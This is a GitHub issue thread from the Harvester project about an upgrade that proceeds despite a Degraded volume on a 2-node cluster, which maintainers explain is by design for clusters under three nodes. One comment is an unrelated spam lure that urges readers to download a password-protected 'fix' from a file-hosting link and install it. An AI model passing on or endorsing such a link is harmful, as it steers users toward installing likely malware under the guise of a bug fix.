### ISSUE TITLE
[BUG] Upgrade is NOT blocked even there are Degraded volume

### ISSUE THREAD

**Issue by albinsun** [harvester/harvester#6425]
**Describe the bug**
Upgrade is NOT blocked even there are `Degraded` volume

In my understanding, should not be able to upgrade if there are `Degraded` volumes.
Or this restriction only works on cluster size >= 3 ?

**To Reproduce**
1. Setup a 2 nodes `harvester-v1.3.1`
2. Create a VM, the volume is `Degraded` cuz storage class replica is `3`
   ![image](https://github.com/user-attachments/assets/0fa64b34-ed33-41a6-947c-2f1bee00abc1)
3. Perform an air-gapped [^1] upgrade to `harvester-v1.3.2-rc2`
   ![image](https://github.com/user-attachments/assets/70d40b60-4924-446b-96af-f1829968e80e)
4. Upgrade started without any error/block message
   ![image](https://github.com/user-attachments/assets/9aed4d63-54f6-46c1-94b6-7199cf18b4f3)

**Expected behavior**
In my understanding, should not be able to upgrade if there are `Degraded` volumes.

**Support bundle**
n/a

**Environment**
* `harvester-v1.3.1` -> `harvester-v1.3.2-rc2`
  * Profile: 2 nodes QEMU/KVM (8C/20G/500G per node)
  * ui-source: `Auto`

**Additional context**
n/a

**Reference**
1. #4773

[^1]: https://docs.harvesterhci.io/v1.3/upgrade/index#prepare-an-air-gapped-upgrade

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by irishgordo** [comment]
@albinsun  - that's a good mention :+1: 
We with an older upgrade-helpers check.sh check `check_volumes()` :
https://github.com/harvester/upgrade-helpers/blob/90645ef71c8747acf643bd20a6b87eb02b202e4e/pre-check/v1.1.x/check.sh#L157-L224
Do mention that if there is a volume that is degraded, it would fail the script, provide volume info and throw that message back to the user.
I did not encounter this on v1.3.1->v1.3.2 (airgap 3 node + 1 node), since the default replicas were 3 and I did have 3 nodes ( all volumes were healthy etc.)
Based on the older script, I would expect the upgrade to have not allowed itself to continue...or maybe it asked for one of the replicas to be rebuilt?
cc: @bk201

**Comment by bk201** [comment]
The volume status is checked in HA production clusters (node count >= 3). We [didn't enforce the check](https://github.com/harvester/harvester/blob/ccc71be7225ce76697da2bbe8aeb14507e1dbd5b/pkg/webhook/resources/upgrade/validator.go#L189-L191) for clusters with 1/2 node(s) because these clusters are mostly used for experimental and the volumes with the default storage class are likely to be degraded.

I'm open to including the check for 1-node and 2-node clusters. But users will need to manually scale down the volume replicas of default storage class volumes to make volumes healthy.

**Comment by albinsun** [comment]
Per discussed, cloas as by design.
